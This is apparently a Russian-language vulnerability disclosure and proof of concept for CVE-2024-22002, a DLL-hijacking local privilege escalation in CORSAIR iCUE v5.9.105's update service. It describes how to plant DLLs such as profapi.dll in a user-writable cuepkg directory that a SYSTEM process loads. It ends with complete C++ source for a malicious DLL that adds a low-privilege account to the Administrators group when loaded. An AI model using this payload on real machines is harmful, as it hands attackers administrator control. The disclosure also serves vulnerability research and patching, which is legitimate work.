
Доказательство концепции уязвимости локального повышения привилегий (CVE-2024-22002) в CORSAIR iCUE v5.9.105 через внедрение DLL во время процесса обновления, что позволяет непривилегированным пользователям получать привилегии SYSTEM.
Уязвимость типа DLL Hijacking была обнаружена в iCUE v5.9.105. Эта уязвимость возникает в процессе обновления, управляемом службой "iCUEUpdateService". Служба запускает процесс ("cuepkg.exe"), ответственный за проведение обновления, работающий с привилегиями "NT AUTHORITY\SYSTEM". При запуске процесса он ищет различные DLL-библиотеки в каталоге \cuepkg-1.2.6, расположенном в каталоге установки iCUE. Некоторые из этих DLL-библиотек по умолчанию отсутствуют, но поскольку обычный пользователь имеет права на создание файлов в этом каталоге, злоумышленник может внедрить вредоносную DLL в этот каталог. Следовательно, эта вредоносная DLL будет загружена cuepkg.exe с правами администратора.
Затронутые DLL-библиотеки, которые были выявлены, следующие:
MSASN1.dllNTASN1.dllprofapi.dllВектор CVSS: (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
В качестве примера будет взята DLL profapi.dll.
%INSTALLDIR%cuepkg-1.2.6.Привилегии пользователя lowpriv до выполнения вредоносной DLL:

Привилегии пользователя lowpriv после выполнения вредоносной DLL:

#include "pch.h"
#include <windows.h>
#include <cstdlib>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
{
system("net localgroup Administrators desktop-ckfiane\\lowpriv /add");
}
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}